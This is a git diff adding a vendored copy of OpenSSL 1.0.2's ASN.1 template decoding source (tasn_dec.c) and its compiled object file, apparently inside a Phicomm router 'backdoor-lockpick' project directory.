+        /* Get each field entry */
+        for (i = 0, tt = it->templates; i < it->tcount; i++, tt++) {
+            const ASN1_TEMPLATE *seqtt;
+            ASN1_VALUE **pseqval;
+            seqtt = asn1_do_adb(pval, tt, 1);
+            if (!seqtt)
+                goto err;
+            pseqval = asn1_get_field_ptr(pval, seqtt);
+            /* Have we ran out of data? */
+            if (!len)
+                break;
+            q = p;
+            if (asn1_check_eoc(&p, len)) {
+                if (!seq_eoc) {
+                    ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_UNEXPECTED_EOC);
+                    goto err;
+                }
+                len -= p - q;
+                seq_eoc = 0;
+                q = p;
+                break;
+            }
+            /*
+             * This determines the OPTIONAL flag value. The field cannot be
+             * omitted if it is the last of a SEQUENCE and there is still
+             * data to be read. This isn't strictly necessary but it
+             * increases efficiency in some cases.
+             */
+            if (i == (it->tcount - 1))
+                isopt = 0;
+            else
+                isopt = (char)(seqtt->flags & ASN1_TFLG_OPTIONAL);
+            /*
+             * attempt to read in field, allowing each to be OPTIONAL
+             */
+
+            ret = asn1_template_ex_d2i(pseqval, &p, len, seqtt, isopt, ctx);
+            if (!ret) {
+                errtt = seqtt;
+                goto err;
+            } else if (ret == -1) {
+                /*
+                 * OPTIONAL component absent. Free and zero the field.
+                 */
+                ASN1_template_free(pseqval, seqtt);
+                continue;
+            }
+            /* Update length */
+            len -= p - q;
+        }
+
+        /* Check for EOC if expecting one */
+        if (seq_eoc && !asn1_check_eoc(&p, len)) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_MISSING_EOC);
+            goto err;
+        }
+        /* Check all data read */
+        if (!seq_nolen && len) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_SEQUENCE_LENGTH_MISMATCH);
+            goto err;
+        }
+
+        /*
+         * If we get here we've got no more data in the SEQUENCE, however we
+         * may not have read all fields so check all remaining are OPTIONAL
+         * and clear any that are.
+         */
+        for (; i < it->tcount; tt++, i++) {
+            const ASN1_TEMPLATE *seqtt;
+            seqtt = asn1_do_adb(pval, tt, 1);
+            if (!seqtt)
+                goto err;
+            if (seqtt->flags & ASN1_TFLG_OPTIONAL) {
+                ASN1_VALUE **pseqval;
+                pseqval = asn1_get_field_ptr(pval, seqtt);
+                ASN1_template_free(pseqval, seqtt);
+            } else {
+                errtt = seqtt;
+                ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_FIELD_MISSING);
+                goto err;
+            }
+        }
+        /* Save encoding */
+        if (!asn1_enc_save(pval, *in, p - *in, it))
+            goto auxerr;
+        *in = p;
+        if (asn1_cb && !asn1_cb(ASN1_OP_D2I_POST, pval, it, NULL))
+            goto auxerr;
+        return 1;
+
+    default:
+        return 0;
+    }
+ auxerr:
+    ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_AUX_ERROR);
+ err:
+    ASN1_item_ex_free(pval, it);
+    if (errtt)
+        ERR_add_error_data(4, "Field=", errtt->field_name,
+                           ", Type=", it->sname);
+    else
+        ERR_add_error_data(2, "Type=", it->sname);
+    return 0;
+}
+
+/*
+ * Templates are handled with two separate functions. One handles any
+ * EXPLICIT tag and the other handles the rest.
+ */
+
+static int asn1_template_ex_d2i(ASN1_VALUE **val,
+                                const unsigned char **in, long inlen,
+                                const ASN1_TEMPLATE *tt, char opt,
+                                ASN1_TLC *ctx)
+{
+    int flags, aclass;
+    int ret;
+    long len;
+    const unsigned char *p, *q;
+    char exp_eoc;
+    if (!val)
+        return 0;
+    flags = tt->flags;
+    aclass = flags & ASN1_TFLG_TAG_CLASS;
+
+    p = *in;
+
+    /* Check if EXPLICIT tag expected */
+    if (flags & ASN1_TFLG_EXPTAG) {
+        char cst;
+        /*
+         * Need to work out amount of data available to the inner content and
+         * where it starts: so read in EXPLICIT header to get the info.
+         */
+        ret = asn1_check_tlen(&len, NULL, NULL, &exp_eoc, &cst,
+                              &p, inlen, tt->tag, aclass, opt, ctx);
+        q = p;
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        } else if (ret == -1)
+            return -1;
+        if (!cst) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_EX_D2I,
+                    ASN1_R_EXPLICIT_TAG_NOT_CONSTRUCTED);
+            return 0;
+        }
+        /* We've found the field so it can't be OPTIONAL now */
+        ret = asn1_template_noexp_d2i(val, &p, len, tt, 0, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        }
+        /* We read the field in OK so update length */
+        len -= p - q;
+        if (exp_eoc) {
+            /* If NDEF we must have an EOC here */
+            if (!asn1_check_eoc(&p, len)) {
+                ASN1err(ASN1_F_ASN1_TEMPLATE_EX_D2I, ASN1_R_MISSING_EOC);
+                goto err;
+            }
+        } else {
+            /*
+             * Otherwise we must hit the EXPLICIT tag end or its an error
+             */
+            if (len) {
+                ASN1err(ASN1_F_ASN1_TEMPLATE_EX_D2I,
+                        ASN1_R_EXPLICIT_LENGTH_MISMATCH);
+                goto err;
+            }
+        }
+    } else
+        return asn1_template_noexp_d2i(val, in, inlen, tt, opt, ctx);
+
+    *in = p;
+    return 1;
+
+ err:
+    ASN1_template_free(val, tt);
+    return 0;
+}
+
+static int asn1_template_noexp_d2i(ASN1_VALUE **val,
+                                   const unsigned char **in, long len,
+                                   const ASN1_TEMPLATE *tt, char opt,
+                                   ASN1_TLC *ctx)
+{
+    int flags, aclass;
+    int ret;
+    const unsigned char *p, *q;
+    if (!val)
+        return 0;
+    flags = tt->flags;
+    aclass = flags & ASN1_TFLG_TAG_CLASS;
+
+    p = *in;
+    q = p;
+
+    if (flags & ASN1_TFLG_SK_MASK) {
+        /* SET OF, SEQUENCE OF */
+        int sktag, skaclass;
+        char sk_eoc;
+        /* First work out expected inner tag value */
+        if (flags & ASN1_TFLG_IMPTAG) {
+            sktag = tt->tag;
+            skaclass = aclass;
+        } else {
+            skaclass = V_ASN1_UNIVERSAL;
+            if (flags & ASN1_TFLG_SET_OF)
+                sktag = V_ASN1_SET;
+            else
+                sktag = V_ASN1_SEQUENCE;
+        }
+        /* Get the tag */
+        ret = asn1_check_tlen(&len, NULL, NULL, &sk_eoc, NULL,
+                              &p, len, sktag, skaclass, opt, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        } else if (ret == -1)
+            return -1;
+        if (!*val)
+            *val = (ASN1_VALUE *)sk_new_null();
+        else {
+            /*
+             * We've got a valid STACK: free up any items present
+             */
+            STACK_OF(ASN1_VALUE) *sktmp = (STACK_OF(ASN1_VALUE) *)*val;
+            ASN1_VALUE *vtmp;
+            while (sk_ASN1_VALUE_num(sktmp) > 0) {
+                vtmp = sk_ASN1_VALUE_pop(sktmp);
+                ASN1_item_ex_free(&vtmp, ASN1_ITEM_ptr(tt->item));
+            }
+        }
+
+        if (!*val) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /* Read as many items as we can */
+        while (len > 0) {
+            ASN1_VALUE *skfield;
+            q = p;
+            /* See if EOC found */
+            if (asn1_check_eoc(&p, len)) {
+                if (!sk_eoc) {
+                    ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I,
+                            ASN1_R_UNEXPECTED_EOC);
+                    goto err;
+                }
+                len -= p - q;
+                sk_eoc = 0;
+                break;
+            }
+            skfield = NULL;
+            if (!ASN1_item_ex_d2i(&skfield, &p, len,
+                                  ASN1_ITEM_ptr(tt->item), -1, 0, 0, ctx)) {
+                ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I,
+                        ERR_R_NESTED_ASN1_ERROR);
+                goto err;
+            }
+            len -= p - q;
+            if (!sk_ASN1_VALUE_push((STACK_OF(ASN1_VALUE) *)*val, skfield)) {
+                ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+        if (sk_eoc) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ASN1_R_MISSING_EOC);
+            goto err;
+        }
+    } else if (flags & ASN1_TFLG_IMPTAG) {
+        /* IMPLICIT tagging */
+        ret = ASN1_item_ex_d2i(val, &p, len,
+                               ASN1_ITEM_ptr(tt->item), tt->tag, aclass, opt,
+                               ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        } else if (ret == -1)
+            return -1;
+    } else {
+        /* Nothing special */
+        ret = ASN1_item_ex_d2i(val, &p, len, ASN1_ITEM_ptr(tt->item),
+                               -1, 0, opt, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        } else if (ret == -1)
+            return -1;
+    }
+
+    *in = p;
+    return 1;
+
+ err:
+    ASN1_template_free(val, tt);
+    return 0;
+}
+
+static int asn1_d2i_ex_primitive(ASN1_VALUE **pval,
+                                 const unsigned char **in, long inlen,
+                                 const ASN1_ITEM *it,
+                                 int tag, int aclass, char opt, ASN1_TLC *ctx)
+{
+    int ret = 0, utype;
+    long plen;
+    char cst, inf, free_cont = 0;
+    const unsigned char *p;
+    BUF_MEM buf;
+    const unsigned char *cont = NULL;
+    long len;
+    if (!pval) {
+        ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ASN1_R_ILLEGAL_NULL);
+        return 0;               /* Should never happen */
+    }
+
+    if (it->itype == ASN1_ITYPE_MSTRING) {
+        utype = tag;
+        tag = -1;
+    } else
+        utype = it->utype;
+
+    if (utype == V_ASN1_ANY) {
+        /* If type is ANY need to figure out type from tag */
+        unsigned char oclass;
+        if (tag >= 0) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ASN1_R_ILLEGAL_TAGGED_ANY);
+            return 0;
+        }
+        if (opt) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE,
+                    ASN1_R_ILLEGAL_OPTIONAL_ANY);
+            return 0;
+        }
+        p = *in;
+        ret = asn1_check_tlen(NULL, &utype, &oclass, NULL, NULL,
+                              &p, inlen, -1, 0, 0, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        }
+        if (oclass != V_ASN1_UNIVERSAL)
+            utype = V_ASN1_OTHER;
+    }
+    if (tag == -1) {
+        tag = utype;
+        aclass = V_ASN1_UNIVERSAL;
+    }
+    p = *in;
+    /* Check header */
+    ret = asn1_check_tlen(&plen, NULL, NULL, &inf, &cst,
+                          &p, inlen, tag, aclass, opt, ctx);
+    if (!ret) {
+        ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ERR_R_NESTED_ASN1_ERROR);
+        return 0;
+    } else if (ret == -1)
+        return -1;
+    ret = 0;
+    /* SEQUENCE, SET and "OTHER" are left in encoded form */
+    if ((utype == V_ASN1_SEQUENCE)
+        || (utype == V_ASN1_SET) || (utype == V_ASN1_OTHER)) {
+        /*
+         * Clear context cache for type OTHER because the auto clear when we
+         * have a exact match wont work
+         */
+        if (utype == V_ASN1_OTHER) {
+            asn1_tlc_clear(ctx);
+        }
+        /* SEQUENCE and SET must be constructed */
+        else if (!cst) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE,
+                    ASN1_R_TYPE_NOT_CONSTRUCTED);
+            return 0;
+        }
+
+        cont = *in;
+        /* If indefinite length constructed find the real end */
+        if (inf) {
+            if (!asn1_find_end(&p, plen, inf))
+                goto err;
+            len = p - cont;
+        } else {
+            len = p - cont + plen;
+            p += plen;
+            buf.data = NULL;
+        }
+    } else if (cst) {
+        if (utype == V_ASN1_NULL || utype == V_ASN1_BOOLEAN
+            || utype == V_ASN1_OBJECT || utype == V_ASN1_INTEGER
+            || utype == V_ASN1_ENUMERATED) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ASN1_R_TYPE_NOT_PRIMITIVE);
+            return 0;
+        }
+        buf.length = 0;
+        buf.max = 0;
+        buf.data = NULL;
+        /*
+         * Should really check the internal tags are correct but some things
+         * may get this wrong. The relevant specs say that constructed string
+         * types should be OCTET STRINGs internally irrespective of the type.
+         * So instead just check for UNIVERSAL class and ignore the tag.
+         */
+        if (!asn1_collect(&buf, &p, plen, inf, -1, V_ASN1_UNIVERSAL, 0)) {
+            free_cont = 1;
+            goto err;
+        }
+        len = buf.length;
+        /* Append a final null to string */
+        if (!BUF_MEM_grow_clean(&buf, len + 1)) {
+            ASN1err(ASN1_F_ASN1_D2I_EX_PRIMITIVE, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        buf.data[len] = 0;
+        cont = (const unsigned char *)buf.data;
+        free_cont = 1;
+    } else {
+        cont = p;
+        len = plen;
+        p += plen;
+    }
+
+    /* We now have content length and type: translate into a structure */
+    if (!asn1_ex_c2i(pval, cont, len, utype, &free_cont, it))
+        goto err;
+
+    *in = p;
+    ret = 1;
+ err:
+    if (free_cont && buf.data)
+        OPENSSL_free(buf.data);
+    return ret;
+}
+
+/* Translate ASN1 content octets into a structure */
+
+int asn1_ex_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                int utype, char *free_cont, const ASN1_ITEM *it)
+{
+    ASN1_VALUE **opval = NULL;
+    ASN1_STRING *stmp;
+    ASN1_TYPE *typ = NULL;
+    int ret = 0;
+    const ASN1_PRIMITIVE_FUNCS *pf;
+    ASN1_INTEGER **tint;
+    pf = it->funcs;
+
+    if (pf && pf->prim_c2i)
+        return pf->prim_c2i(pval, cont, len, utype, free_cont, it);
+    /* If ANY type clear type and set pointer to internal value */
+    if (it->utype == V_ASN1_ANY) {
+        if (!*pval) {
+            typ = ASN1_TYPE_new();
+            if (typ == NULL)
+                goto err;
+            *pval = (ASN1_VALUE *)typ;
+        } else
+            typ = (ASN1_TYPE *)*pval;
+
+        if (utype != typ->type)
+            ASN1_TYPE_set(typ, utype, NULL);
+        opval = pval;
+        pval = &typ->value.asn1_value;
+    }
+    switch (utype) {
+    case V_ASN1_OBJECT:
+        if (!c2i_ASN1_OBJECT((ASN1_OBJECT **)pval, &cont, len))
+            goto err;
+        break;
+
+    case V_ASN1_NULL:
+        if (len) {
+            ASN1err(ASN1_F_ASN1_EX_C2I, ASN1_R_NULL_IS_WRONG_LENGTH);
+            goto err;
+        }
+        *pval = (ASN1_VALUE *)1;
+        break;
+
+    case V_ASN1_BOOLEAN:
+        if (len != 1) {
+            ASN1err(ASN1_F_ASN1_EX_C2I, ASN1_R_BOOLEAN_IS_WRONG_LENGTH);
+            goto err;
+        } else {
+            ASN1_BOOLEAN *tbool;
+            tbool = (ASN1_BOOLEAN *)pval;
+            *tbool = *cont;
+        }
+        break;
+
+    case V_ASN1_BIT_STRING:
+        if (!c2i_ASN1_BIT_STRING((ASN1_BIT_STRING **)pval, &cont, len))
+            goto err;
+        break;
+
+    case V_ASN1_INTEGER:
+    case V_ASN1_NEG_INTEGER:
+    case V_ASN1_ENUMERATED:
+    case V_ASN1_NEG_ENUMERATED:
+        tint = (ASN1_INTEGER **)pval;
+        if (!c2i_ASN1_INTEGER(tint, &cont, len))
+            goto err;
+        /* Fixup type to match the expected form */
+        (*tint)->type = utype | ((*tint)->type & V_ASN1_NEG);
+        break;
+
+    case V_ASN1_OCTET_STRING:
+    case V_ASN1_NUMERICSTRING:
+    case V_ASN1_PRINTABLESTRING:
+    case V_ASN1_T61STRING:
+    case V_ASN1_VIDEOTEXSTRING:
+    case V_ASN1_IA5STRING:
+    case V_ASN1_UTCTIME:
+    case V_ASN1_GENERALIZEDTIME:
+    case V_ASN1_GRAPHICSTRING:
+    case V_ASN1_VISIBLESTRING:
+    case V_ASN1_GENERALSTRING:
+    case V_ASN1_UNIVERSALSTRING:
+    case V_ASN1_BMPSTRING:
+    case V_ASN1_UTF8STRING:
+    case V_ASN1_OTHER:
+    case V_ASN1_SET:
+    case V_ASN1_SEQUENCE:
+    default:
+        if (utype == V_ASN1_BMPSTRING && (len & 1)) {
+            ASN1err(ASN1_F_ASN1_EX_C2I, ASN1_R_BMPSTRING_IS_WRONG_LENGTH);
+            goto err;
+        }
+        if (utype == V_ASN1_UNIVERSALSTRING && (len & 3)) {
+            ASN1err(ASN1_F_ASN1_EX_C2I,
+                    ASN1_R_UNIVERSALSTRING_IS_WRONG_LENGTH);
+            goto err;
+        }
+        /* All based on ASN1_STRING and handled the same */
+        if (!*pval) {
+            stmp = ASN1_STRING_type_new(utype);
+            if (!stmp) {
+                ASN1err(ASN1_F_ASN1_EX_C2I, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            *pval = (ASN1_VALUE *)stmp;
+        } else {
+            stmp = (ASN1_STRING *)*pval;
+            stmp->type = utype;
+        }
+        /* If we've already allocated a buffer use it */
+        if (*free_cont) {
+            if (stmp->data)
+                OPENSSL_free(stmp->data);
+            stmp->data = (unsigned char *)cont; /* UGLY CAST! RL */
+            stmp->length = len;
+            *free_cont = 0;
+        } else {
+            if (!ASN1_STRING_set(stmp, cont, len)) {
+                ASN1err(ASN1_F_ASN1_EX_C2I, ERR_R_MALLOC_FAILURE);
+                ASN1_STRING_free(stmp);
+                *pval = NULL;
+                goto err;
+            }
+        }
+        break;
+    }
+    /* If ASN1_ANY and NULL type fix up value */
+    if (typ && (utype == V_ASN1_NULL))
+        typ->value.ptr = NULL;
+
+    ret = 1;
+ err:
+    if (!ret) {
+        ASN1_TYPE_free(typ);
+        if (opval)
+            *opval = NULL;
+    }
+    return ret;
+}
+
+/*
+ * This function finds the end of an ASN1 structure when passed its maximum
+ * length, whether it is indefinite length and a pointer to the content. This
+ * is more efficient than calling asn1_collect because it does not recurse on
+ * each indefinite length header.
+ */
+
+static int asn1_find_end(const unsigned char **in, long len, char inf)
+{
+    int expected_eoc;
+    long plen;
+    const unsigned char *p = *in, *q;
+    /* If not indefinite length constructed just add length */
+    if (inf == 0) {
+        *in += len;
+        return 1;
+    }
+    expected_eoc = 1;
+    /*
+     * Indefinite length constructed form. Find the end when enough EOCs are
+     * found. If more indefinite length constructed headers are encountered
+     * increment the expected eoc count otherwise just skip to the end of the
+     * data.
+     */
+    while (len > 0) {
+        if (asn1_check_eoc(&p, len)) {
+            expected_eoc--;
+            if (expected_eoc == 0)
+                break;
+            len -= 2;
+            continue;
+        }
+        q = p;
+        /* Just read in a header: only care about the length */
+        if (!asn1_check_tlen(&plen, NULL, NULL, &inf, NULL, &p, len,
+                             -1, 0, 0, NULL)) {
+            ASN1err(ASN1_F_ASN1_FIND_END, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        }
+        if (inf)
+            expected_eoc++;
+        else
+            p += plen;
+        len -= p - q;
+    }
+    if (expected_eoc) {
+        ASN1err(ASN1_F_ASN1_FIND_END, ASN1_R_MISSING_EOC);
+        return 0;
+    }
+    *in = p;
+    return 1;
+}
+
+/*
+ * This function collects the asn1 data from a constructred string type into
+ * a buffer. The values of 'in' and 'len' should refer to the contents of the
+ * constructed type and 'inf' should be set if it is indefinite length.
+ */
+
+#ifndef ASN1_MAX_STRING_NEST
+/*
+ * This determines how many levels of recursion are permitted in ASN1 string
+ * types. If it is not limited stack overflows can occur. If set to zero no
+ * recursion is allowed at all. Although zero should be adequate examples
+ * exist that require a value of 1. So 5 should be more than enough.
+ */
+# define ASN1_MAX_STRING_NEST 5
+#endif
+
+static int asn1_collect(BUF_MEM *buf, const unsigned char **in, long len,
+                        char inf, int tag, int aclass, int depth)
+{
+    const unsigned char *p, *q;
+    long plen;
+    char cst, ininf;
+    p = *in;
+    inf &= 1;
+    /*
+     * If no buffer and not indefinite length constructed just pass over the
+     * encoded data
+     */
+    if (!buf && !inf) {
+        *in += len;
+        return 1;
+    }
+    while (len > 0) {
+        q = p;
+        /* Check for EOC */
+        if (asn1_check_eoc(&p, len)) {
+            /*
+             * EOC is illegal outside indefinite length constructed form
+             */
+            if (!inf) {
+                ASN1err(ASN1_F_ASN1_COLLECT, ASN1_R_UNEXPECTED_EOC);
+                return 0;
+            }
+            inf = 0;
+            break;
+        }
+
+        if (!asn1_check_tlen(&plen, NULL, NULL, &ininf, &cst, &p,
+                             len, tag, aclass, 0, NULL)) {
+            ASN1err(ASN1_F_ASN1_COLLECT, ERR_R_NESTED_ASN1_ERROR);
+            return 0;
+        }
+
+        /* If indefinite length constructed update max length */
+        if (cst) {
+            if (depth >= ASN1_MAX_STRING_NEST) {
+                ASN1err(ASN1_F_ASN1_COLLECT, ASN1_R_NESTED_ASN1_STRING);
+                return 0;
+            }
+            if (!asn1_collect(buf, &p, plen, ininf, tag, aclass, depth + 1))
+                return 0;
+        } else if (plen && !collect_data(buf, &p, plen))
+            return 0;
+        len -= p - q;
+    }
+    if (inf) {
+        ASN1err(ASN1_F_ASN1_COLLECT, ASN1_R_MISSING_EOC);
+        return 0;
+    }
+    *in = p;
+    return 1;
+}
+
+static int collect_data(BUF_MEM *buf, const unsigned char **p, long plen)
+{
+    int len;
+    if (buf) {
+        len = buf->length;
+        if (!BUF_MEM_grow_clean(buf, len + plen)) {
+            ASN1err(ASN1_F_COLLECT_DATA, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        memcpy(buf->data + len, *p, plen);
+    }
+    *p += plen;
+    return 1;
+}
+
+/* Check for ASN1 EOC and swallow it if found */
+
+static int asn1_check_eoc(const unsigned char **in, long len)
+{
+    const unsigned char *p;
+    if (len < 2)
+        return 0;
+    p = *in;
+    if (!p[0] && !p[1]) {
+        *in += 2;
+        return 1;
+    }
+    return 0;
+}
+
+/*
+ * Check an ASN1 tag and length: a bit like ASN1_get_object but it sets the
+ * length for indefinite length constructed form, we don't know the exact
+ * length but we can set an upper bound to the amount of data available minus
+ * the header length just read.
+ */
+
+static int asn1_check_tlen(long *olen, int *otag, unsigned char *oclass,
+                           char *inf, char *cst,
+                           const unsigned char **in, long len,
+                           int exptag, int expclass, char opt, ASN1_TLC *ctx)
+{
+    int i;
+    int ptag, pclass;
+    long plen;
+    const unsigned char *p, *q;
+    p = *in;
+    q = p;
+
+    if (ctx && ctx->valid) {
+        i = ctx->ret;
+        plen = ctx->plen;
+        pclass = ctx->pclass;
+        ptag = ctx->ptag;
+        p += ctx->hdrlen;
+    } else {
+        i = ASN1_get_object(&p, &plen, &ptag, &pclass, len);
+        if (ctx) {
+            ctx->ret = i;
+            ctx->plen = plen;
+            ctx->pclass = pclass;
+            ctx->ptag = ptag;
+            ctx->hdrlen = p - q;
+            ctx->valid = 1;
+            /*
+             * If definite length, and no error, length + header can't exceed
+             * total amount of data available.
+             */
+            if (!(i & 0x81) && ((plen + ctx->hdrlen) > len)) {
+                ASN1err(ASN1_F_ASN1_CHECK_TLEN, ASN1_R_TOO_LONG);
+                asn1_tlc_clear(ctx);
+                return 0;
+            }
+        }
+    }
+
+    if (i & 0x80) {
+        ASN1err(ASN1_F_ASN1_CHECK_TLEN, ASN1_R_BAD_OBJECT_HEADER);
+        asn1_tlc_clear(ctx);
+        return 0;
+    }
+    if (exptag >= 0) {
+        if ((exptag != ptag) || (expclass != pclass)) {
+            /*
+             * If type is OPTIONAL, not an error: indicate missing type.
+             */
+            if (opt)
+                return -1;
+            asn1_tlc_clear(ctx);
+            ASN1err(ASN1_F_ASN1_CHECK_TLEN, ASN1_R_WRONG_TAG);
+            return 0;
+        }
+        /*
+         * We have a tag and class match: assume we are going to do something
+         * with it
+         */
+        asn1_tlc_clear(ctx);
+    }
+
+    if (i & 1)
+        plen = len - (p - q);
+
+    if (inf)
+        *inf = i & 1;
+
+    if (cst)
+        *cst = i & V_ASN1_CONSTRUCTED;
+
+    if (olen)
+        *olen = plen;
+
+    if (oclass)
+        *oclass = pclass;
+
+    if (otag)
+        *otag = ptag;
+
+    *in = p;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_dec.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_dec.o
new file mode 100644
index 0000000000000000000000000000000000000000..d76d041e35229d3e20fc0ecb7f7fa1257acb1bac
GIT binary patch
literal 12848
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
